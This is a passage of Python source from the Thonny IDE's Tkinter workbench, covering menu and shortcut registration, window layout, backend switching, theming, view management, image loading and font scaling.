server_socket = socket.socket(socket.AF_UNIX) # @UndefinedVariable
server_socket.bind(thonny.get_ipc_file_path())
secret = ""
os.chmod(thonny.get_ipc_file_path(), 0o600)
return server_socket, secret
def _init_commands(self) -> None:
self.add_command(
"exit",
"file",
tr("Exit"),
self._on_close,
default_sequence=select_sequence("<Alt-F4>", "<Command-q>", "<Control-q>"),
extra_sequences=["<Alt-F4>"]
if running_on_linux()
else ["<Control-q>"]
if running_on_windows()
else [],
)
self.add_command("show_options", "tools", tr("Options..."), self.show_options, group=180)
self.createcommand("::tk::mac::ShowPreferences", self.show_options)
self.createcommand("::tk::mac::Quit", self._mac_quit)
self.add_command(
"increase_font_size",
"view",
tr("Increase font size"),
lambda: self._change_font_size(1),
default_sequence=select_sequence("<Control-plus>", "<Command-Shift-plus>"),
extra_sequences=["<Control-KP_Add>"],
group=60,
)
self.add_command(
"decrease_font_size",
"view",
tr("Decrease font size"),
lambda: self._change_font_size(-1),
default_sequence=select_sequence("<Control-minus>", "<Command-minus>"),
extra_sequences=["<Control-KP_Subtract>"],
group=60,
)
self.bind("<Control-MouseWheel>", self._cmd_zoom_with_mouse, True)
self.add_command(
"focus_editor",
"view",
tr("Focus editor"),
self._cmd_focus_editor,
default_sequence=select_sequence("<Alt-e>", "<Command-Alt-e>"),
group=70,
)
self.add_command(
"focus_shell",
"view",
tr("Focus shell"),
self._cmd_focus_shell,
default_sequence=select_sequence("<Alt-s>", "<Command-Alt-s>"),
group=70,
)
if self.get_ui_mode() == "expert":
self.add_command(
"toggle_maximize_view",
"view",
tr("Maximize view"),
self._cmd_toggle_maximize_view,
flag_name="view.maximize_view",
default_sequence=None,
group=80,
)
self.bind_class("TNotebook", "<Double-Button-1>", self._maximize_view, True)
self.bind("<Escape>", self._unmaximize_view, True)
self.add_command(
"toggle_maximize_view",
"view",
tr("Full screen"),
self._cmd_toggle_full_screen,
flag_name="view.full_screen",
default_sequence=select_sequence("<F11>", "<Command-Shift-F>"),
group=80,
)
if self.in_simple_mode():
self.add_command(
"font",
"tools",
tr("Change font size"),
caption=tr("Zoom"),
handler=self._toggle_font_size,
image="zoom",
include_in_toolbar=True,
)
self.add_command(
"quit",
"help",
tr("Exit Thonny"),
self._on_close,
image="quit",
caption=tr("Quit"),
include_in_toolbar=True,
group=101,
)
if thonny.in_debug_mode():
self.bind_all("<Control-Shift-Alt-D>", self._print_state_for_debugging, True)
def _print_state_for_debugging(self, event) -> None:
print(get_runner()._postponed_commands)
def _init_containers(self) -> None:
margin = 10
# Main frame functions as
# - a backgroud behind padding of main_pw, without this OS X leaves white border
# - a container to be hidden, when a view is maximized and restored when view is back home
main_frame = ttk.Frame(self) #
self._main_frame = main_frame
main_frame.grid(row=1, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
self._maximized_view = None # type: Optional[tk.Widget]
self._toolbar = ttk.Frame(main_frame, padding=0)
self._toolbar.grid(column=0, row=0, sticky=tk.NSEW, padx=margin, pady=(5, 0))
self.set_default("layout.west_pw_width", self.scale(150))
self.set_default("layout.east_pw_width", self.scale(150))
self.set_default("layout.s_nb_height", self.scale(150))
self.set_default("layout.nw_nb_height", self.scale(150))
self.set_default("layout.sw_nb_height", self.scale(150))
self.set_default("layout.ne_nb_height", self.scale(150))
self.set_default("layout.se_nb_height", self.scale(150))
self._main_pw = AutomaticPanedWindow(main_frame, orient=tk.HORIZONTAL)
self._main_pw.grid(column=0, row=1, sticky=tk.NSEW, padx=margin, pady=(margin, 0))
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
self._west_pw = AutomaticPanedWindow(
self._main_pw,
1,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.west_pw_width"),
)
self._center_pw = AutomaticPanedWindow(self._main_pw, 2, orient=tk.VERTICAL)
self._east_pw = AutomaticPanedWindow(
self._main_pw,
3,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.east_pw_width"),
)
self._view_notebooks = {
"nw": AutomaticNotebook(
self._west_pw, 1, preferred_size_in_pw=self.get_option("layout.nw_nb_height")
),
"w": AutomaticNotebook(self._west_pw, 2),
"sw": AutomaticNotebook(
self._west_pw, 3, preferred_size_in_pw=self.get_option("layout.sw_nb_height")
),
"s": AutomaticNotebook(
self._center_pw, 3, preferred_size_in_pw=self.get_option("layout.s_nb_height")
),
"ne": AutomaticNotebook(
self._east_pw, 1, preferred_size_in_pw=self.get_option("layout.ne_nb_height")
),
"e": AutomaticNotebook(self._east_pw, 2),
"se": AutomaticNotebook(
self._east_pw, 3, preferred_size_in_pw=self.get_option("layout.se_nb_height")
),
}
for nb_name in self._view_notebooks:
self.set_default("layout.notebook_" + nb_name + "_visible_view", None)
self._editor_notebook = EditorNotebook(self._center_pw)
self._editor_notebook.position_key = 1
self._center_pw.insert("auto", self._editor_notebook)
self._statusbar = ttk.Frame(main_frame)
self._statusbar.grid(column=0, row=2, sticky="nsew", padx=margin, pady=(0))
self._statusbar.columnconfigure(2, weight=2)
self._status_label = ttk.Label(self._statusbar, text="")
self._status_label.grid(row=1, column=1, sticky="w")
self._init_backend_switcher()
def _init_backend_switcher(self):
# Set up the menu
self._backend_conf_variable = tk.StringVar(value="{}")
self._backend_menu = tk.Menu(self._statusbar, tearoff=False)
# Set up the button
self._backend_button = ttk.Button(self._statusbar, text="", style="Toolbutton")
self._backend_button.grid(row=1, column=3, sticky="e")
self._backend_button.configure(command=self._post_backend_menu)
def _post_backend_menu(self):
menu_font = tk_font.nametofont("TkMenuFont")
def choose_backend():
backend_conf = ast.literal_eval(self._backend_conf_variable.get())
assert isinstance(backend_conf, dict), "backend conf is %r" % backend_conf
for name, value in backend_conf.items():
self.set_option(name, value)
get_runner().restart_backend(False)
self._backend_menu.delete(0, "end")
max_description_width = 0
button_text_width = menu_font.measure(self._backend_button.cget("text"))
num_entries = 0
for backend in sorted(self.get_backends().values(), key=lambda x: x.sort_key):
entries = backend.proxy_class.get_switcher_entries()
if not entries:
continue
if len(entries) == 1:
self._backend_menu.add_radiobutton(
label=backend.description,
command=choose_backend,
variable=self._backend_conf_variable,
value=repr(entries[0][0]),
)
else:
submenu = tk.Menu(self._backend_menu, tearoff=False)
for conf, label in entries:
submenu.add_radiobutton(
label=label,
command=choose_backend,
variable=self._backend_conf_variable,
value=repr(conf),
)
self._backend_menu.add_cascade(label=backend.description, menu=submenu)
max_description_width = max(
menu_font.measure(backend.description), max_description_width
)
num_entries += 1
# self._backend_conf_variable.set(value=self.get_option("run.backend_name"))
self._backend_menu.add_separator()
self._backend_menu.add_command(
label=tr("Configure interpreter..."),
command=lambda: self.show_options("interpreter"),
)
post_x = self._backend_button.winfo_rootx()
post_y = self._backend_button.winfo_rooty()
if self.winfo_screenwidth() / self.winfo_screenheight() > 2:
# Most likely several monitors.
# Tk will adjust x properly with single monitor, but when Thonny is maximized
# on a monitor, which has another monitor to its right, the menu can be partially
# displayed on another monitor (at least in Ubuntu).
width_diff = max_description_width - button_text_width
post_x -= width_diff + menu_font.measure("mmm")
if running_on_mac_os():
# won't be good location otherwise
popup_entry = num_entries + 4
else:
popup_entry = ""
# print(post_x, post_y)
try:
self._backend_menu.tk_popup(post_x, post_y, entry=popup_entry)
except tk.TclError as e:
if not 'unknown option "-state"' in str(e):
logger.warning("Problem with switcher popup", exc_info=e)
def _on_backend_restart(self, event):
proxy = get_runner().get_backend_proxy()
if proxy:
desc = proxy.get_clean_description()
self._backend_conf_variable.set(value=repr(proxy.get_current_switcher_configuration()))
else:
backend_conf = self._backends.get(self.get_option("run.backend_name"), None)
if backend_conf:
desc = backend_conf.description
else:
desc = "<no backend>"
self._backend_button.configure(text=desc)
def _init_theming(self) -> None:
self._style = ttk.Style()
self._ui_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleUiThemeSettings, Dict[str, str]]] # value is (parent, settings, images)
self._syntax_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleSyntaxThemeSettings]] # value is (parent, settings)
self.set_default("view.ui_theme", ui_utils.get_default_theme())
def add_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]] = None,
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences=False,
) -> None:
"""Registers an item to be shown in specified menu.
Args:
menu_name: Name of the menu the command should appear in.
Standard menu names are "file", "edit", "run", "view", "help".
If a menu with given name doesn't exist, then new menu is created
(with label=name).
command_label: Label for this command
handler: Function to be called when the command is invoked.
Should be callable with one argument (the event or None).
tester: Function to be called for determining if command is available or not.
Should be callable with one argument (the event or None).
Should return True or False.
If None then command is assumed to be always available.
default_sequence: Default shortcut (Tk style)
flag_name: Used for toggle commands. Indicates the name of the boolean option.
group: Used for grouping related commands together. Value should be int.
Groups with smaller numbers appear before.
Returns:
None
"""
# Temporary solution for plug-ins made for versions before 3.2
if menu_name == "device":
menu_name = "tools"
group = 150
# store command to be published later
self._commands.append(
dict(
command_id=command_id,
menu_name=menu_name,
command_label=command_label,
handler=handler,
tester=tester,
default_sequence=default_sequence,
extra_sequences=extra_sequences,
flag_name=flag_name,
skip_sequence_binding=skip_sequence_binding,
accelerator=accelerator,
group=group,
position_in_group=position_in_group,
image=image,
caption=caption,
alternative_caption=alternative_caption,
include_in_menu=include_in_menu,
include_in_toolbar=include_in_toolbar,
submenu=submenu,
bell_when_denied=bell_when_denied,
show_extra_sequences=show_extra_sequences,
)
)
def _publish_commands(self) -> None:
for cmd in self._commands:
self._publish_command(**cmd)
def _publish_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]],
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences: bool = False,
) -> None:
def dispatch(event=None):
if not tester or tester():
denied = False
handler()
else:
denied = True
logging.debug("Command '" + command_id + "' execution denied")
if bell_when_denied:
self.bell()
self.event_generate("UICommandDispatched", command_id=command_id, denied=denied)
sequence_option_name = "shortcuts." + command_id
self.set_default(sequence_option_name, default_sequence)
sequence = self.get_option(sequence_option_name)
if sequence:
if not skip_sequence_binding:
self.bind_all(sequence, dispatch, True)
# register shortcut even without binding
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
for extra_sequence in extra_sequences:
self.bind_all(extra_sequence, dispatch, True)
if "greek_" not in extra_sequence.lower() or running_on_linux():
# Use greek alternatives only on Linux
# (they are not required on Mac
# and cause double events on Windows)
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
menu = self.get_menu(menu_name)
if image:
_image = self.get_image(image) # type: Optional[tk.PhotoImage]
_disabled_image = self.get_image(image, disabled=True)
else:
_image = None
_disabled_image = None
if not accelerator and sequence:
accelerator = sequence_to_accelerator(sequence)
"""
# Does not work on Mac
if show_extra_sequences:
for extra_seq in extra_sequences:
accelerator += " or " + sequence_to_accelerator(extra_seq)
"""
if include_in_menu:
def dispatch_from_menu():
# I don't like that Tk menu toggles checbutton variable
# automatically before calling the handler.
# So I revert the toggle before calling the actual handler.
# This way the handler doesn't have to worry whether it
# needs to toggle the variable or not, and it can choose to
# decline the toggle.
if flag_name is not None:
var = self.get_variable(flag_name)
var.set(not var.get())
dispatch(None)
if _image and lookup_style_option("OPTIONS", "icons_in_menus", True):
menu_image = _image # type: Optional[tk.PhotoImage]
elif flag_name:
# no image or black next to a checkbox
menu_image = None
else:
menu_image = self.get_image("16x16-blank")
# remember the details that can't be stored in Tkinter objects
self._menu_item_specs[(menu_name, command_label)] = MenuItem(
group, position_in_group, tester
)
menu.insert(
self._find_location_for_menu_item(menu_name, command_label),
"checkbutton" if flag_name else "cascade" if submenu else "command",
label=command_label,
accelerator=accelerator,
image=menu_image,
compound=tk.LEFT,
variable=self.get_variable(flag_name) if flag_name else None,
command=dispatch_from_menu if handler else None,
menu=submenu,
)
if include_in_toolbar:
toolbar_group = self._get_menu_index(menu) * 100 + group
assert caption is not None
self._add_toolbar_button(
command_id,
_image,
_disabled_image,
command_label,
caption,
caption if alternative_caption is None else alternative_caption,
accelerator,
handler,
tester,
toolbar_group,
)
def add_view(
self,
cls: Type[tk.Widget],
label: str,
default_location: str,
visible_by_default: bool = False,
default_position_key: Optional[str] = None,
) -> None:
"""Adds item to "View" menu for showing/hiding given view.
Args:
view_class: Class or constructor for view. Should be callable with single
argument (the master of the view)
label: Label of the view tab
location: Location descriptor. Can be "nw", "sw", "s", "se", "ne"
Returns: None
"""
view_id = cls.__name__
if default_position_key == None:
default_position_key = label
self.set_default("view." + view_id + ".visible", visible_by_default)
self.set_default("view." + view_id + ".location", default_location)
self.set_default("view." + view_id + ".position_key", default_position_key)
if self.in_simple_mode():
visibility_flag = tk.BooleanVar(value=view_id in SIMPLE_MODE_VIEWS)
else:
visibility_flag = cast(tk.BooleanVar, self.get_variable("view." + view_id + ".visible"))
self._view_records[view_id] = {
"class": cls,
"label": label,
"location": self.get_option("view." + view_id + ".location"),
"position_key": self.get_option("view." + view_id + ".position_key"),
"visibility_flag": visibility_flag,
}
# handler
def toggle_view_visibility():
if visibility_flag.get():
self.hide_view(view_id)
else:
self.show_view(view_id, True)
self.add_command(
"toggle_" + view_id,
menu_name="view",
command_label=label,
handler=toggle_view_visibility,
flag_name="view." + view_id + ".visible",
group=10,
position_in_group="alphabetic",
)
def add_configuration_page(
self, key: str, title: str, page_class: Type[tk.Widget], order: int
) -> None:
self._configuration_pages.append((key, title, page_class, order))
def add_content_inspector(self, inspector_class: Type) -> None:
self.content_inspector_classes.append(inspector_class)
def add_backend(
self,
name: str,
proxy_class: Type[BackendProxy],
description: str,
config_page_constructor,
sort_key=None,
) -> None:
self._backends[name] = BackendSpec(
name,
proxy_class,
description,
config_page_constructor,
sort_key if sort_key is not None else description,
)
# assing names to related classes
proxy_class.backend_name = name # type: ignore
proxy_class.backend_description = description # type: ignore
if not getattr(config_page_constructor, "backend_name", None):
config_page_constructor.backend_name = name
def add_ui_theme(
self,
name: str,
parent: Union[str, None],
settings: FlexibleUiThemeSettings,
images: Dict[str, str] = {},
) -> None:
if name in self._ui_themes:
warn(tr("Overwriting theme '%s'") % name)
self._ui_themes[name] = (parent, settings, images)
def add_syntax_theme(
self, name: str, parent: Optional[str], settings: FlexibleSyntaxThemeSettings
) -> None:
if name in self._syntax_themes:
warn(tr("Overwriting theme '%s'") % name)
self._syntax_themes[name] = (parent, settings)
def get_usable_ui_theme_names(self) -> Sequence[str]:
return sorted([name for name in self._ui_themes if self._ui_themes[name][0] is not None])
def get_syntax_theme_names(self) -> Sequence[str]:
return sorted(self._syntax_themes.keys())
def get_ui_mode(self) -> str:
return self._active_ui_mode
def in_simple_mode(self) -> bool:
return self.get_ui_mode() == "simple"
def scale(self, value: Union[int, float]) -> int:
if isinstance(value, (int, float)):
# using int instead of round so that thin lines will stay
# one pixel even with scaling_factor 1.67
result = int(self._scaling_factor * value)
if result == 0 and value > 0:
# don't lose thin lines because of scaling
return 1
else:
return result
else:
raise NotImplementedError("Only numeric dimensions supported at the moment")
def _register_ui_theme_as_tk_theme(self, name: str) -> None:
# collect settings from all ancestors
total_settings = [] # type: List[FlexibleUiThemeSettings]
total_images = {} # type: Dict[str, str]
temp_name = name
while True:
parent, settings, images = self._ui_themes[temp_name]
total_settings.insert(0, settings)
for img_name in images:
total_images.setdefault(img_name, images[img_name])
if parent is not None:
temp_name = parent
else:
# reached start of the chain
break
assert temp_name in self._style.theme_names()
# only root of the ancestors is relevant for theme_create,
# because the method actually doesn't take parent settings into account
# (https://mail.python.org/pipermail/tkinter-discuss/2015-August/003752.html)
self._style.theme_create(name, temp_name)
self._image_mapping_by_theme[name] = total_images
# load images
self.get_image("tab-close", "img_close")
self.get_image("tab-close-active", "img_close_active")
# apply settings starting from root ancestor
for settings in total_settings:
if callable(settings):
settings = settings()
if isinstance(settings, dict):
self._style.theme_settings(name, settings)
else:
for subsettings in settings:
self._style.theme_settings(name, subsettings)
def _apply_ui_theme(self, name: str) -> None:
self._current_theme_name = name
if name not in self._style.theme_names():
self._register_ui_theme_as_tk_theme(name)
self._style.theme_use(name)
# https://wiki.tcl.tk/37973#pagetocfe8b22ab
for setting in ["background", "foreground", "selectBackground", "selectForeground"]:
value = self._style.lookup("Listbox", setting)
if value:
self.option_add("*TCombobox*Listbox." + setting, value)
self.option_add("*Listbox." + setting, value)
text_opts = self._style.configure("Text")
if text_opts:
for key in text_opts:
self.option_add("*Text." + key, text_opts[key])
if hasattr(self, "_menus"):
# if menus have been initialized, ie. when theme is being changed
for menu in self._menus.values():
menu.configure(get_style_configuration("Menu"))
self.update_fonts()
def _apply_syntax_theme(self, name: str) -> None:
def get_settings(name):
try:
parent, settings = self._syntax_themes[name]
except KeyError:
self.report_exception("Can't find theme '%s'" % name)
return {}
if callable(settings):
settings = settings()
if parent is None:
return settings
else:
result = get_settings(parent)
for key in settings:
if key in result:
result[key].update(settings[key])
else:
result[key] = settings[key]
return result
from thonny import codeview
codeview.set_syntax_options(get_settings(name))
def reload_themes(self) -> None:
preferred_theme = self.get_option("view.ui_theme")
available_themes = self.get_usable_ui_theme_names()
if preferred_theme in available_themes:
self._apply_ui_theme(preferred_theme)
elif "Enhanced Clam" in available_themes:
self._apply_ui_theme("Enhanced Clam")
elif "Windows" in available_themes:
self._apply_ui_theme("Windows")
self._apply_syntax_theme(self.get_option("view.syntax_theme"))
def uses_dark_ui_theme(self) -> bool:
name = self._style.theme_use()
while True:
if "dark" in name.lower():
return True
name, _, _ = self._ui_themes[name]
if name is None:
# reached start of the chain
break
return False
def _init_program_arguments_frame(self) -> None:
self.set_default("view.show_program_arguments", False)
self.set_default("run.program_arguments", "")
self.set_default("run.past_program_arguments", [])
visibility_var = self.get_variable("view.show_program_arguments")
content_var = self.get_variable("run.program_arguments")
frame = ttk.Frame(self._toolbar)
col = 1000
self._toolbar.columnconfigure(col, weight=1)
label = ttk.Label(frame, text=tr("Program arguments:"))
label.grid(row=0, column=0, sticky="nse", padx=5)
self.program_arguments_box = ttk.Combobox(
frame,
width=80,
height=15,
textvariable=content_var,
values=[""] + self.get_option("run.past_program_arguments"),
)
self.program_arguments_box.grid(row=0, column=1, sticky="nsew", padx=5)
frame.columnconfigure(1, weight=1)
def update_visibility():
if visibility_var.get():
if not frame.winfo_ismapped():
frame.grid(row=0, column=col, sticky="nse")
else:
if frame.winfo_ismapped():
frame.grid_remove()
def toggle():
visibility_var.set(not visibility_var.get())
update_visibility()
self.add_command(
"viewargs",
"view",
tr("Program arguments"),
toggle,
flag_name="view.show_program_arguments",
group=11,
)
update_visibility()
def _init_regular_mode_link(self):
if self.get_ui_mode() != "simple":
return
label = ttk.Label(
self._toolbar,
text=tr("Switch to\nregular\nmode"),
justify="right",
font="SmallLinkFont",
style="Url.TLabel",
cursor="hand2",
)
label.grid(row=0, column=1001, sticky="ne")
def on_click(event):
self.set_option("general.ui_mode", "regular")
tk.messagebox.showinfo(
tr("Regular mode"),
tr(
"Configuration has been updated. "
+ "Restart Thonny to start working in regular mode.\n\n"
+ "(See 'Tools → Options → General' if you change your mind later.)"
),
master=self,
)
label.bind("<1>", on_click, True)
def _switch_backend_group(self, group):
pass
def _switch_darkness(self, mode):
pass
def _switch_to_regular_mode(self):
pass
def log_program_arguments_string(self, arg_str: str) -> None:
arg_str = arg_str.strip()
self.set_option("run.program_arguments", arg_str)
if arg_str == "":
# empty will be handled differently
return
past_args = self.get_option("run.past_program_arguments")
if arg_str in past_args:
past_args.remove(arg_str)
past_args.insert(0, arg_str)
past_args = past_args[:10]
self.set_option("run.past_program_arguments", past_args)
self.program_arguments_box.configure(values=[""] + past_args)
def _show_views(self) -> None:
for view_id in self._view_records:
if self._view_records[view_id]["visibility_flag"].get():
try:
self.show_view(view_id, False)
except Exception:
self.report_exception("Problem showing " + view_id)
def update_image_mapping(self, mapping: Dict[str, str]) -> None:
"""Was used by thonny-pi. Not recommended anymore"""
self._default_image_mapping.update(mapping)
def get_backends(self) -> Dict[str, BackendSpec]:
return self._backends
def get_option(self, name: str, default=None) -> Any:
# Need to return Any, otherwise each typed call site needs to cast
return self._configuration_manager.get_option(name, default)
def set_option(self, name: str, value: Any) -> None:
self._configuration_manager.set_option(name, value)
def get_local_cwd(self) -> str:
cwd = self.get_option("run.working_directory")
if os.path.exists(cwd):
return normpath_with_actual_case(cwd)
else:
return normpath_with_actual_case(os.path.expanduser("~"))
def set_local_cwd(self, value: str) -> None:
if self.get_option("run.working_directory") != value:
self.set_option("run.working_directory", value)
if value:
self.event_generate("LocalWorkingDirectoryChanged", cwd=value)
def set_default(self, name: str, default_value: Any) -> None:
"""Registers a new option.
If the name contains a period, then the part left to the (first) period
will become the section of the option and rest will become name under that
section.
If the name doesn't contain a period, then it will be added under section
"general".
"""
self._configuration_manager.set_default(name, default_value)
def get_variable(self, name: str) -> tk.Variable:
return self._configuration_manager.get_variable(name)
def get_menu(self, name: str, label: Optional[str] = None) -> tk.Menu:
"""Gives the menu with given name. Creates if not created yet.
Args:
name: meant to be used as not translatable menu name
label: translated label, used only when menu with given name doesn't exist yet
"""
if name not in self._menus:
if running_on_mac_os():
conf = {}
else:
conf = get_style_configuration("Menu")
menu = tk.Menu(self._menubar, **conf)
menu["postcommand"] = lambda: self._update_menu(menu, name)
self._menubar.add_cascade(label=label if label else name, menu=menu)
self._menus[name] = menu
if label:
self._menus[label] = menu
return self._menus[name]
def get_view(self, view_id: str, create: bool = True) -> tk.Widget:
if "instance" not in self._view_records[view_id]:
if not create:
raise RuntimeError("View %s not created" % view_id)
class_ = self._view_records[view_id]["class"]
location = self._view_records[view_id]["location"]
master = self._view_notebooks[location]
# create the view
view = class_(self) # View's master is workbench to allow making it maximized
view.position_key = self._view_records[view_id]["position_key"]
self._view_records[view_id]["instance"] = view
# create the view home_widget to be added into notebook
view.home_widget = ttk.Frame(master)
view.home_widget.columnconfigure(0, weight=1)
view.home_widget.rowconfigure(0, weight=1)
view.home_widget.maximizable_widget = view # type: ignore
view.home_widget.close = lambda: self.hide_view(view_id) # type: ignore
if hasattr(view, "position_key"):
view.home_widget.position_key = view.position_key # type: ignore
# initially the view will be in it's home_widget
view.grid(row=0, column=0, sticky=tk.NSEW, in_=view.home_widget)
view.hidden = True
return self._view_records[view_id]["instance"]
def get_editor_notebook(self) -> EditorNotebook:
assert self._editor_notebook is not None
return self._editor_notebook
def get_package_dir(self):
"""Returns thonny package directory"""
return os.path.dirname(sys.modules["thonny"].__file__)
def get_image(
self, filename: str, tk_name: Optional[str] = None, disabled=False
) -> tk.PhotoImage:
if filename in self._image_mapping_by_theme[self._current_theme_name]:
filename = self._image_mapping_by_theme[self._current_theme_name][filename]
if filename in self._default_image_mapping:
filename = self._default_image_mapping[filename]
# if path is relative then interpret it as living in res folder
if not os.path.isabs(filename):
filename = os.path.join(self.get_package_dir(), "res", filename)
if not os.path.exists(filename):
if os.path.exists(filename + ".png"):
filename = filename + ".png"
elif os.path.exists(filename + ".gif"):
filename = filename + ".gif"
if disabled:
filename = os.path.join(
os.path.dirname(filename), "_disabled_" + os.path.basename(filename)
)
if not os.path.exists(filename):
return None
# are there platform-specific variants?
plat_filename = filename[:-4] + "_" + platform.system() + ".png"
if os.path.exists(plat_filename):
filename = plat_filename
if self._scaling_factor >= 2.0:
scaled_filename = filename[:-4] + "_2x.png"
if os.path.exists(scaled_filename):
filename = scaled_filename
else:
img = tk.PhotoImage(file=filename)
# can't use zoom method, because this doesn't allow name
img2 = tk.PhotoImage(tk_name)
self.tk.call(
img2,
"copy",
img.name,
"-zoom",
int(self._scaling_factor),
int(self._scaling_factor),
)
self._images.add(img2)
return img2
img = tk.PhotoImage(tk_name, file=filename)
self._images.add(img)
return img
def show_view(self, view_id: str, set_focus: bool = True) -> Union[bool, tk.Widget]:
"""View must be already registered.
Args:
view_id: View class name
without package name (eg. 'ShellView')"""
if view_id == "MainFileBrowser":
# Was renamed in 3.1.1
view_id = "FilesView"
# NB! Don't forget that view.home_widget is added to notebook, not view directly
# get or create
view = self.get_view(view_id)
notebook = view.home_widget.master # type: ignore
if hasattr(view, "before_show") and view.before_show() == False: # type: ignore
return False
if view.hidden: # type: ignore
notebook.insert(
"auto", view.home_widget, text=self._view_records[view_id]["label"] # type: ignore
)
view.hidden = False # type: ignore
if hasattr(view, "on_show"): # type: ignore
view.on_show()
# switch to the tab
notebook.select(view.home_widget) # type: ignore
# add focus
if set_focus:
view.focus_set()
self.set_option("view." + view_id + ".visible", True)
self.event_generate("ShowView", view=view, view_id=view_id)
return view
def hide_view(self, view_id: str) -> Union[bool, None]:
# NB! Don't forget that view.home_widget is added to notebook, not view directly
if "instance" in self._view_records[view_id]:
# TODO: handle the case, when view is maximized
view = self._view_records[view_id]["instance"]
if view.hidden:
return True
if hasattr(view, "before_hide") and view.before_hide() == False:
return False
view.home_widget.master.forget(view.home_widget)
self.set_option("view." + view_id + ".visible", False)
self.event_generate("HideView", view=view, view_id=view_id)
view.hidden = True
return True
def event_generate(self, sequence: str, event: Optional[Record] = None, **kwargs) -> None:
"""Uses custom event handling when sequence doesn't start with <.
In this case arbitrary attributes can be added to the event.
Otherwise forwards the call to Tk's event_generate"""
# pylint: disable=arguments-differ
if sequence.startswith("<"):
assert event is None
tk.Tk.event_generate(self, sequence, **kwargs)
else:
if sequence in self._event_handlers:
if event is None:
event = WorkbenchEvent(sequence, **kwargs)
else:
event.update(kwargs)
# make a copy of handlers, so that event handler can remove itself
# from the registry during iteration
# (or new handlers can be added)
for handler in sorted(self._event_handlers[sequence].copy(), key=str):
try:
handler(event)
except Exception:
self.report_exception("Problem when handling '" + sequence + "'")
if not self._closing:
self._update_toolbar()
def bind(self, sequence: str, func: Callable, add: bool = None) -> None: # type: ignore
"""Uses custom event handling when sequence doesn't start with <.
Otherwise forwards the call to Tk's bind"""
# pylint: disable=signature-differs
if not add:
logging.warning(
"Workbench.bind({}, ..., add={}) -- did you really want to replace existing bindings?".format(
sequence, add
)
)
if sequence.startswith("<"):
tk.Tk.bind(self, sequence, func, add)
else:
if sequence not in self._event_handlers or not add:
self._event_handlers[sequence] = set()
self._event_handlers[sequence].add(func)
def unbind(self, sequence: str, func=None) -> None:
# pylint: disable=arguments-differ
if sequence.startswith("<"):
tk.Tk.unbind(self, sequence, funcid=func)
else:
try:
self._event_handlers[sequence].remove(func)
except Exception:
logger.exception("Can't remove binding for '%s' and '%s'", sequence, func)
def in_heap_mode(self) -> bool:
# TODO: add a separate command for enabling the heap mode
# untie the mode from HeapView
return self._configuration_manager.has_option("view.HeapView.visible") and self.get_option(
"view.HeapView.visible"
)
def in_debug_mode(self) -> bool:
return (
os.environ.get("THONNY_DEBUG", False)
in [
"1",
1,
"True",
True,
"true",
]
or self.get_option("general.debug_mode", False)
)
def _init_scaling(self) -> None:
self._default_scaling_factor = self.tk.call("tk", "scaling")
if self._default_scaling_factor > 10:
# it may be infinity in eg. Fedora
self._default_scaling_factor = 1.33
scaling = self.get_option("general.scaling")
if scaling in ["default", "auto"]: # auto was used in 2.2b3
self._scaling_factor = self._default_scaling_factor
else:
self._scaling_factor = float(scaling)
MAC_SCALING_MODIFIER = 1.7
if running_on_mac_os():
self._scaling_factor *= MAC_SCALING_MODIFIER
self.tk.call("tk", "scaling", self._scaling_factor)
font_scaling_mode = self.get_option("general.font_scaling_mode")
if (
running_on_linux()
and font_scaling_mode in ["default", "extra"]
and scaling not in ["default", "auto"]
):
# update system fonts which are given in pixel sizes
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
# According to do documentation, absolute values of negative font sizes
# should be interpreted as pixel sizes (not affected by "tk scaling")
# and positive values are point sizes, which are supposed to scale automatically
# http://www.tcl.tk/man/tcl8.6/TkCmd/font.htm#M26
# Unfortunately it seems that this cannot be relied on
# https://groups.google.com/forum/#!msg/comp.lang.tcl/ZpL6tq77M4M/GXImiV2INRQJ
# My experiments show that manually changing negative font sizes
# doesn't have any effect -- fonts keep their default size
# (Tested in Raspbian Stretch, Ubuntu 18.04 and Fedora 29)
# On the other hand positive sizes scale well (and they don't scale automatically)
# convert pixel sizes to point_size
if orig_size < 0:
orig_size = -orig_size / self._default_scaling_factor
# scale
scaled_size = round(
orig_size * (self._scaling_factor / self._default_scaling_factor)
)
f.configure(size=scaled_size)
elif running_on_mac_os() and scaling not in ["default", "auto"]:
# see http://wiki.tcl.tk/44444
# update system fonts
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
assert orig_size > 0
f.configure(size=int(orig_size * self._scaling_factor / MAC_SCALING_MODIFIER))
def update_fonts(self) -> None:
editor_font_size = self._guard_font_size(self.get_option("view.editor_font_size"))
editor_font_family = self.get_option("view.editor_font_family")
io_font_size = self._guard_font_size(self.get_option("view.io_font_size"))
io_font_family = self.get_option("view.io_font_family")
for io_name in [
"IOFont",
"BoldIOFont",
"UnderlineIOFont",
"ItalicIOFont",
"BoldItalicIOFont",
]:
tk_font.nametofont(io_name).configure(family=io_font_family, size=io_font_size)
try:
